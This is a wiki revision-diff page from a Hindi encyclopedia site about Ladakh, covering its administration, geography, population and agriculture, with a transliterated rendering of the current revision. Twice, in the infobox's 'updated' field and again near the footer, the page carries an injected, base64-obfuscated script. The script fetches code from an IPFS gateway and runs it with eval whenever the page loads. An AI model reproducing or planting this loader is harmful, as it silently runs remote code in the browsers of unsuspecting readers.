Difference between revisions of "लद्दाख"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(2 intermediate revisions by the same user not shown)
Line 28: Line 28:
 
|उच्च न्यायालय=जम्मू और कश्मीर उच्च न्यायालय
 
|उच्च न्यायालय=जम्मू और कश्मीर उच्च न्यायालय
 
|राज्यपाल=
 
|राज्यपाल=
|उपराज्यपाल=राधाकृष्ण माथुर
+
|उपराज्यपाल=[[राधाकृष्ण माथुर]]
 
|प्रशासक=
 
|प्रशासक=
 
|मुख्यमंत्री=
 
|मुख्यमंत्री=
Line 53: Line 53:
 
|emblem=Blank-1.gif
 
|emblem=Blank-1.gif
 
}}
 
}}
'''लद्दाख''' [[उत्तरी भारत]] का एक केन्द्र शासित प्रदेश है, जो उत्तर में [[कराकोरम पर्वत श्रेणी|काराकोरम पर्वत]] और दक्षिण में [[हिमालय|हिमालय पर्वत]] के बीच में स्थित है। यह [[भारत]] के सबसे विरल जनसंख्या वाले भागों में से एक है।
+
'''लद्दाख''' [[उत्तरी भारत]] का एक केन्द्र शासित प्रदेश है, जो उत्तर में [[कराकोरम पर्वत श्रेणी|काराकोरम पर्वत]] और दक्षिण में [[हिमालय|हिमालय पर्वत]] के बीच में स्थित है। यह [[भारत]] के सबसे विरल जनसंख्या वाले भागों में से एक है। सीमावर्ती स्थिति के कारण सामरिक दृष्टि से इसका बड़ा महत्व है। लद्दाख, उत्तर-पश्चिमी हिमालय के पर्वतीय क्रम में आता है, जहाँ का अधिकांश धरातल कृषि योग्य नहीं है।
  
 
*वृहद [[हिमालय]] पर्वत [[नृजातीय]], सांस्कृतिक और भौतिक दृष्टि से एक विशाल विभाजक है, जो पूर्वोत्तर की ओर कम जनसंख्या वाले राज्य लद्दाख (जिसे कभी - कभी 'छोटी तिब्बत' भी कहते हैं) को बाँटता है।  
 
*वृहद [[हिमालय]] पर्वत [[नृजातीय]], सांस्कृतिक और भौतिक दृष्टि से एक विशाल विभाजक है, जो पूर्वोत्तर की ओर कम जनसंख्या वाले राज्य लद्दाख (जिसे कभी - कभी 'छोटी तिब्बत' भी कहते हैं) को बाँटता है।  
Line 61: Line 61:
 
*[[1970]] में कृषि वैज्ञानिकों द्वारा परिचित कराए गए पौधों के कारण कई बाग़ और सब्ज़ियों के खेत अब लद्दाख में पनप गए हैं।  
 
*[[1970]] में कृषि वैज्ञानिकों द्वारा परिचित कराए गए पौधों के कारण कई बाग़ और सब्ज़ियों के खेत अब लद्दाख में पनप गए हैं।  
 
*चरागाहों में याक का पालन प्रोत्साहित किया जा रहा है।
 
*चरागाहों में याक का पालन प्रोत्साहित किया जा रहा है।
*लद्दाख में कश्मीरी बकरियों का पालन होता है, जिससे पश्मीना मिलता है और यह बढ़िया क़िस्म के शाल आदि वस्त्र बनाने के काम आता है।  
+
*लद्दाख में कश्मीरी बकरियों का पालन होता है, जिससे पश्मीना मिलता है और यह बढ़िया क़िस्म के शाल आदि वस्त्र बनाने के काम आता है।
 +
*लद्दाख का विश्‍व प्रसिद्ध 'गोम्‍पा' उत्‍सव [[जून]] महीने में मनाया जाता है।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}

Latest revision as of 10:21, 29 August 2021

laddakh
rajadhani leh
rajabhasha(ean) tibbati, laddakhi, hindi (adhikarik)
sthapana 31 aktoobar, 2019
janasankhya 2,74,289 (2011)
· ghanatv 4.6 ki.mi.2 (12 vargamil) /varg kimi
kshetraphal 59146 ki.mi.2 (22,836 vargamil)
bhaugolik nirdeshaank 34°10′12″N 77°34′48″E
zile 02
uchch nyayalay jammoo aur kashmir uchch nyayalay
uparajyapal radhakrishna mathur
vahan panjikaran tibie (TBA)
bahari k diyaan adhikarik vebasait
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

laddakh uttari bharat ka ek kendr shasit pradesh hai, jo uttar mean karakoram parvat aur dakshin mean himalay parvat ke bich mean sthit hai. yah bharat ke sabase viral janasankhya vale bhagoan mean se ek hai. simavarti sthiti ke karan samarik drishti se isaka b da mahatv hai. laddakh, uttar-pashchimi himalay ke parvatiy kram mean ata hai, jahaan ka adhikaansh dharatal krishi yogy nahian hai.

  • vrihad himalay parvat nrijatiy, saanskritik aur bhautik drishti se ek vishal vibhajak hai, jo poorvottar ki or kam janasankhya vale rajy laddakh (jise kabhi - kabhi 'chhoti tibbat' bhi kahate haian) ko baantata hai.
  • poorv mean leh ke asapas ke nivasi mukhyatah tibbati poorvajoan aur bhasha (laddikhi) vale bauddh haian, lekin pashchim mean karagil ke asapas janasankhya mukhyatah muslim hai aur islam ki shiya shakha ki hai.
  • laddakh mean kheti siandhu, shyok aur suru nadiyoan ki ghatiyoan jaisi kuchh mukhy ghatiyoan mean hi simit hai.
  • yahaan par chhote - chhote sianchit bhookhandoan mean jau, kutu, shalajam aur sarasoan ki kheti ki jati hai.
  • 1970 mean krishi vaijnanikoan dvara parichit karae ge paudhoan ke karan kee bag aur sabziyoan ke khet ab laddakh mean panap ge haian.
  • charagahoan mean yak ka palan protsahit kiya ja raha hai.
  • laddakh mean kashmiri bakariyoan ka palan hota hai, jisase pashmina milata hai aur yah badhiya qism ke shal adi vastr banane ke kam ata hai.
  • laddakh ka vishh‍v prasiddh 'gomh‍pa' uth‍sav joon mahine mean manaya jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

tika tippani aur sandarbh

sanbandhit lekh